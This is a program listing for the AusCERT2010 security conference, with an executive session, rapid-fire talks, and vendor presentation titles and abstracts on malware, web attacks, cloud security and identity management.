We all know being CxO of a major organisation is an enormous responsibility, with some of the most difficult management decisions. Become more confident in managing your organisation’s information security at the executive level. Learn from senior information security experts and network with other managers. The goal of the AusCERT2010 Executive Program is to get to the heart of the issues facing executives managing information security and its related impacts at a strategic level, by exploring scenarios that only senior managers face. This program has been developed specifically for CEOs, CIOs and senior managers of major Australian organisations to network with their peers, and discuss such issues in an informal atmosphere. At the AusCERT2010 Executive Program, CEOs, CISOs and senior managers will gain advice from leading cyber security experts and other executive managers. The session provides Executives with an opportunity to discuss their security problems in a non-technical forum with leaders of other organisations facing the same sorts of challenges. |
|
| AusCERT Turbo Talks | |
|
A series of rapid-fire 5 minute presentations by AusCERT2010 delegates. Sign-ups will open at the start of Monday's conference program and will close at the end of Monday's proceedings. To Register your turbo talk, please seek-out AusCERT staff at the AusCERT stand (during breaks is preferred) on Monday. A staff member will be assigned to record and assess your idea on the spot. There is no pre-registration available for this session. All proposals must be submitted on Monday, and must be made by existing AusCERT conference delegates or on their behalf. Topic proposals must be related to information security but can otherwise address any aspect of the field; though the AusCERT program committee reserves the right to disallow a topic or speaker without negotiation or recourse for complaint. The final speakers list will be posted during the plenary session on Tuesday morning. During the session, the 5 minute time limit for presenters shall be strictly administered by an independent, third-party chairperson. |
|
| Securing the Internet for a Web 2.0 Collaborative Culture | |
| Gerhard Eschelbeck - Webroot | |
|
Gerhard’s presentation will discuss the convergence of the latest Web 2.0 and Social Media based threats and the Malware economy. The presentation will provide the audience with technical, behavioural and political insight into what the latest threats are and what the New Media providers are doing to protect their users. Particular attention will be provided to new cloud computing platforms in terms of their potential as a platform to launch attacks (I.e. Facebook, Twitter) and how cloud computing technology is emerging as the best practice technique for protecting both enterprise and consumers. Gerhard will also provide an updated view on the state of the overall threat ecosystem and the latest information about the size and velocity of the current threats and why cloud computing will polarise risk mitigation strategies to the cloud and endpoint. Finally as the adoption of cloud computing is becoming mainstream Gerhard will discuss emerging concerns about cloud computing and questions over resiliency and jurisdictional control. |
|
| Beyond Aurora's Veil: A Vulnerable Tale | |
| Derek Manky - Fortinet | |
|
In 2009, the Conficker worm was dissected by researchers, and then fried by the spotlight on a worldwide stage. One year later, we saw the Aurora assaults similarly glow in the headlines. Defense was tense against these two nasties – yet, in each case, easily circumvented by two potent zero-day exploits that crept in from the digital depths. Derek Manky will provide case studies on the zero-days, along with live demonstrations. Manky will go on to highlight drive-by attacks launched during Conficker's rise, which have provided growth to one of today's largest botnets – Bredolab. He will show sophisticated techniques and structure Bredolab has developed over the course of a year. Illuminating their shadows, Manky will unveil these threats in order to provide insight and provoke thought for a broader defense strategy, instead of using reactive tunnel-vision that is all too common. |
|
| Protect Critical Data and Systems with Proactive IT Security | |
| Andrew Latham - Tripwire | |
| Securing the New Network: Firewalls in a mobile world | |
| Nicko van Someren - Juniper Networks | |
| While the physical topologies of our networks have not changed a great deal over the last decade, the way in which we use these networks has evolved a long way. Corporate networks are still segmented along geographic and functional lines but their users are increasingly mobile and untethered from the physical net. Services that once resided on corporate servers inside the network now are hosted on clouds of servers in far-flung locations. Where once there were one-to-one mappings between users and services and their respective IP addresses, now the network addresses can vary moment to moment. In this world, old models for network security begin to break down and we need to look at network security problems in a whole new way. In this talk we present a new approach to network security, one that focuses on users, devices and services rather than network topology. We show that thinking about network security in this was can lead to systems that are more flexible and more manageable as well as being more secure. | |
| Securing the 21st Century | |
| Andy Solterbeck - Telstra | |
| Telstra will present an overview of our approach to Securing the 21st Century workspace. The presentation includes current real world security case studies including their origin, consequences and most importantly remediation. The intent of this presentation is to highlight the service providers unique capabilities covering capacity, visibility and skills to defend your changing borders from hacking or large scale DOS attacks. | |
| The Anatomy of an Attack - Modern Fraud Detection | |
| Colby DeRodeff - ArcSight | |
|
The Anatomy of an Attack – Modern Fraud Detection The rise of the Internet as a transaction platform has brought great change to the financial services, manufacturing, power, healthcare, retail, and related industries. Driven to cut operating costs and provide better response through self-service, firms have aggressively rolled out online services to clients. As customers become more comfortable using Web systems for payments, transfers and other transactions, the amount of dollars moved via online services has exploded. As a result, fifteen years into the “Internet revolution” we see more users than ever before, executing more transactions online than ever before. These may be bill payments or wire transfers, self-service stock trades, or personal payments through services such as PayPal. This rise in online finance has been matched by an equal rise in malware, hackers, and organized criminals, using increasingly sophisticated methods to steal money from clients. The overall result is more money at risk, more fraud, and less trust in online financial services. Recent examples include:
This presentation will explore fundamental fraud concepts across multiple business verticals as well as threats from outside and within the organization. We will take an in-depth look at the most prevalent threats for the coming years as well as advanced prevention, detection and response mechanisms. The presentation will explore several real-life use cases focused on bringing network, application, and database countermeasures together to mitigate fraud. Areas of focus will include:
|
|
| Managed SIEM Unmasked | |
| Gavin Matthews - Seccom Global | |
| Culture Shift: Social Networking and Enterprise Environments (Security Risk vs Reward) | |
| John Pirc - 3com/TippingPoint Technologies | |
| The need for Dynamic Network Security in 2010 and Beyond | |
| Patrick Sweeney - SonicWALL | |
| No abstract provided for this presentation yet. Please check again later. | |
| Dude Where's My Data - Web Application and Database Security De constructed | |
| Terry Ray - Imperva | |
| Daily incidents of unauthorized data access attempts grew exponentially from 2008 to 2009. SQL Injection, administrative privilege escalation and other such activities are estimated to have affected 80% of organizations, whether they were aware of the event or not. There has been no evidence of this data attack or access trend diminishing and yet there is still little standard industry knowledge or practice around preventing those activities. This presentation will explore today's data security statistics and issues, as well as, the tactics, both successful and unsuccessful, organizations use to combat this problem. The most common access point to organizational data is through web based applications and direct database administration. The discussion will focus on these access points and the backend databases themselves. | |
| Social Networking and Cyber-Security: Strength, Weakness, Opportunity, or Threat? | |
| Matt Keil - Palo Alto Networks | |
| No abstract provided for this presentation yet. Please check again later. | |
| BZM XNT BQZBJ SGD BNCD? | |
| Paul Ducklin - Sophos | |
|
Can you crack the code? Come to this talk for a fascinating live demonstration of code-breaking through the ages. We won't just talk about how codes and ciphers get broken, or how they fail, we'll actually carry out the cracks live. From the ancient Spartans and Julius Caesar, through the ciphers of Blaise de Vigenere and Thomas Jefferson (a cryptographer more famous as the third President of the USA), right to modern cryptosystems such as WEP and SSL. Being interesting and entertaining is only a secondary goal of this talk. The primary goal is to convince you, by actions rather than by words (and without mentioning any products, honestly!), of two things: that encryption is worth doing, and that it is worth doing well. |
|
| e-Crime, the Age of Cybergeddon | |
| Jason Pearce - M86 Security | |
|
Cybergeddon?... This is a term coined by the FBI. The current crimeware landcape has been dubbed as 'Cybergeddon' due to a combination of increasing sophistication of both the cybercriminals and their tools; the low detection and prosecution rate; and the financial stakes triggering a sharp increase in cybercrime during 2009 and moving into 2010. This session will explore the reasons why we are in Cybergeddon, the business impact and the evolution of the criminal element; how the industry operated, the most common techniques used and the complexity and diversity of the current threat landscape. |
|
| The Future of Digital Security: The Kaspersky Vision | |
| Eugene Kaspersky - Kaskpersky | |
| In his presentation 'The Future of Digital Security: The Kaspersky Vision', Eugene Kaspersky, CEO and co-founder, Kaspersky Lab, will describe the main factors driving the global cybercrime industry, main challeges and threats faced by the international community and the possible side effects of the swift evolution of digital devices, networks and online services. Eugene Kaspresky will also present his vision of the ways that can help to solve or at least improve the cybercrime problem globally. | |
| Maintaining Control and Compliance in Cloud Computing: Data-centric information security | |
| Andrew Younger - SafeNet | |
|
There’s no doubt about it: virtualization is the future. With its promises of flexibility, ease of use, and lower costs, Service Oriented Architectures (SOA) and Virtualization have lead IT toward the new outsourced computing model known as Cloud. The success of Software-as-a-service (SaaS) Cloud-based processes have fast become the next-generation SOA solutions for a number of today’s applications. Corporate acceptances of Cloud-based processes have moved beyond CRMs and Web Portals toward more traditional core business applications. The introduction of these approaches into the traditional enterprise has definite business advantages, but also some serious governance, compliance and security implications. The "virtual" nature of Cloud removes many of the physical work-flow and control points to contain sensitive information. It is essential that Cloud-enabled security platform take on a data-centric approach. This session will provide details on the impact of Cloud on information security and the data-centric solutions for specific use-cases.
|
|
| Defense Strategy against Advanced Persistent Threats | |
| Rishi Bhargava - McAfee | |
| No abstract provided for this presentation yet. Please check again later. | |
| Computer Theft and Data Security for the Mobile Workforce | |
| Mark Winter - inTechnology | |
| No abstract provided for this presentation yet. Please check again later. | |
| Trend Micro is Security that Fits: in a Virtual World | |
| Glynn Stokes - Trend Micro | |
| No abstract provided for this presentation yet. Please check again later. | |
| Identity Management - methodologies and tools to make user self service a reality | |
| Paul Conroy - Microsoft | |
|
IT security teams can deliver tangible benefit to their organisations through identity management. The on-boarding of new users and the access rights and privileges that they receive through the time of their employment is a fundamental requirement for all organisations. How well this is managed directly impacts the control IT security teams have over their environment and how efficient IT staff are within an organisation. Immature identity management systems mean that skilled IT staff are performing repetitive functions and making decisions about user privilege that is best left of business owners. This live demo dominated session will give insight into the methodologies and tools used to optimise identity management. A large portion of the session will show mechanisms to allow new users to be provisioned into an Active Directory environment based on business rules and workflow and how these new users can be set up to self manage groups and distribution lists. There will also be a demonstration of tools to allow self service attribute changes and self service reset of passwords. A large portion of this session will deal with managing identities within an Active Directory world, but time will be spent on tools to allow integration of AD attributes to other major directory and database platforms. |
|
| Vulnerability & Configuration Management Best Practices | |
| Joe Revels - Ncircle | |
| Creating audience specific and actionable reporting/processes for minimizing vulnerability risk and achieving compliance management. A how to presentation on what to do with all the data created with these types of solutions and who should do what with it. | |
| The Web is the Battleground; and Social Networks Lead the Charge | |
| Corey Nachreiner - WatchGuard | |
|
Our web browser has become the universal app. We no longer use it just to peruse static web pages, but to interact with a menagerie of complex online applications hosted “in the cloud.” While this evolution of web interactivity provides us with many new opportunities, and immense value, it has also made today’s web the most dangerous place on the Internet. Join WatchGuard Senior Network Security Strategist and CISSP, Corey Nachreiner, to hear why he believes web-based threats will pose a huge risk to your network in 2010. During the talk, you will learn how the three most common web-based attacks -- drive-by downloads, cross-site scripting (XSS), and SQL injection – work. You’ll even see them in action during sample attacks. Nachreiner will also discuss why Social Networks sites are the worst “web-threat” offenders of them all. He’ll highlight three attributes that make Social Networks a ripe target for attackers, and likely the primary source of malware in the coming years. Finally, and most importantly, you’ll learn practical steps you can take, and defenses you can erect, to protect yourself from these web-based threats. As the American cartoon, G.I. Joe, used to say, “Knowing is half the battle.” Join us at AusCERT to get the knowledge you need to win this web battle! |
|
| Cloud Computing and Security - are they really like oil & water? | |
| Paul Ashley - IBM | |
| During this session, we will explore the IT Security challenges posed by cloud computing and demonstrate how you can add security to the mix to implement a safe cloud | |
| Global insight into Web 2.0 in the workplace today | |
| Richard Turner - Clearswift | |
|
As web communications and collaboration have matured and become more and more integral to people’s lives so companies are now increasingly using such technologies to connect more effectively internally and externally with customers, suppliers and partners. As the traditional 9-5 way of working continues to fade, companies have to adjust to the new world order that Web 2.0 brings to the workplace, harnessing the benefits whilst being mindful of the potential threats. In this presentation, Richard Turner, chief executive officer, will outline the results of global research conducted in 2010 on behalf of Clearswift. The results explore the good, the bad, the ugly of Web 2.0 from the perspective of managers and employees and highlights ways in which companies can better harness the benefits of Web 2.0 without losing control over people and content. He will also outline how Australian companies compare to their global counterparts. |
|
| Identities Are Ready To Party! What's Next? | |
| Clarence Cheah - Oracle | |
| No abstract provided for this presentation yet. Please check again later. | |
| What's on a CISO's mind in 2010? | |
| James Turner - IBRS | |
| No abstract provided for this presentation yet. Please check again later. | |
| Anatomy of a Data Breach: Why Breaches Happen and What to Do About It | |
| Sean Kopelke - Symantec | |
| No abstract provided for this presentation yet. Please check again later. | |
| Why Unified Content Security is More Important Than Ever | |
| Devin Redmond - Websense | |
|
This session will cover:
|
|
| Identity Management at Queensland Health: A True Story! | |
| Tim Redhead - Dotsec | |
| No abstract provided for this presentation yet. Please check again later. | |
| Understanding and Teaching Heuristics | |
| Randy Abrams - ESET | |
|
This paper is designed to provide a basic understanding of what heuristics are and how they are used in the anti-malware industry. Topics covered include signature based detection, generic signatures, passive heuristics, and active heuristics or emulation. A very basic compression algorithm is developed and taught so as to enhance understanding of how compression works and why it poses problems for signature based detection. Encryption and polymorphism are also explained in easy to understand terms and examples. A variety of false positives from a variety of unspecified products are used to reveal some of the types of thinking that go into creating heuristic approaches. For those who already understand the subject, the approach used should provide insight into effective methods of teaching complex technical subjects to less technical students, or even to technical people who are simply unfamiliar with the subject. |
|
| Enhanced PKI Validation with SCVP | |
| Hari Nair - Axway | |
|
PKI-enabled systems depend on digital certificates to establish identity and trust. However, issuance of digital certificates alone is not enough to ensure the integrity of today’s increasingly complex PKIs. Learn about Axway’s new Validation Authority with Server-based Certificate Validation Protocol (SCVP) and how it can enhance processing of certificates by any application. It’s no longer enough to simply authenticate -when you can authorize, track, monitor and audit. No matter how complicated your trust relationships become, SCVP offers the confidence that users and systems will have the proper credentials when performing transactions |
|
| Digging for Identity Management Gold: Australian Role Mining Case Study | |
| Nick Engelman - CA | |
|
Ask most organisations what’s holding up their Identity Management program and they’ll tell you it’s agreeing the roles. Despite best efforts, access to resources is often based on copying the rights of similar users, adding users to a swathe of sprawling groups, and in more cases than the security officer would like to acknowledge, the ad hoc granting of direct links. They’re effectively stumbling at the first hurdle, as they struggle with the “Role Based” component of RBAC. It’s a self-evident truth that users will (nearly always) end up with the access needed to do their jobs. However, in most organisations this is achieved through over-provisioning, with rights rarely satisfying separation of duties, regualtory and internal policy requirements. Auditing actual rights in such systems requires expert domain knowledge, and profiling and cleaning system access can be likened to painting the Sydney Harbour Bridge … once you finish, its time to start again. While overprovisioning must be addressed, the solution is not to ignore or discard the existing system. Role mining seeks to extract the necessary and sufficient rights from the total set of rights currently granted to users, and to identify genuine roles from within the existing system, application and organisational framework. A combination of top-down, bottom-up and blended approaches generates a role model that can be put into place to provide an auditable, manageable role-based solution. This is the building-block required for organisations to move to a genuine identity management solution to user management. Join us as we follow the journey of one Australian organisation that undertook the task of profiling their existing applications to extract a tightly-defined, robust and manageable role-model that was then put into place to drive their identity management systems. They also achieved compliance and audit targets as a side-benefit of this program of works. |
|
| Smartphone Security: From a Perspective of the Ten Immutable Laws of Security | |
| Chris Bender & Ian Robertson - Blackberry | |
|
First published by Microsoft, the Ten Immutable Laws of Security serve as a framework for describing the prominent risks in contemporary computing. Looking at these in the context of mobility, we will explore where we as an industry are winning, and where we are still challenged in the risk management and security game. Considering the situations where mobility is being used, the types of information accessed or processed and new applications themselves, security is even more important than in the desktop space. When you carry your life with you everywhere you go, what does it take for your security to be considered good enough? |
|
| New Threats, Intelligent Solutions | |
| Sam Pickles - F5 Networks | |
| No abstract provided for this presentation yet. Please check again later. | |
| Protecting your e-Business from Cyber Attacks in Real Time | |
| John Dubber - Radware | |
| No abstract provided for this presentation yet. Please check again later. | |
| Web Security - Adapt to Survive | |
| Anthony Farr - Blue Coat Systems | |
| No abstract provided for this presentation yet. Please check again later. | |
| Beef-Up your security with mobile technologies: An insight for all IT professionals | |
| Jeat Shyan Wong - TalariaX | |
| IT professionals have many challenges. One of the challenge is to ensure security and integrity of the network infrastructure of their organisation. However, with greater technological advancement and connectivity, maintaining security is getting more complex. Phishing, hacking, DDOS and others are surfacing daily, requiring IT professionals to enhance the security protection for their company. This session will analyse and provide an insight into using mobile technologies to enhance the security management in a company. | |
| What is a "Security Group Tag" (SGT) and how will it improve identity controls in my network? | |
| Colin Bradley - Cisco | |
| No abstract provided for this presentation yet. Please check again later. | |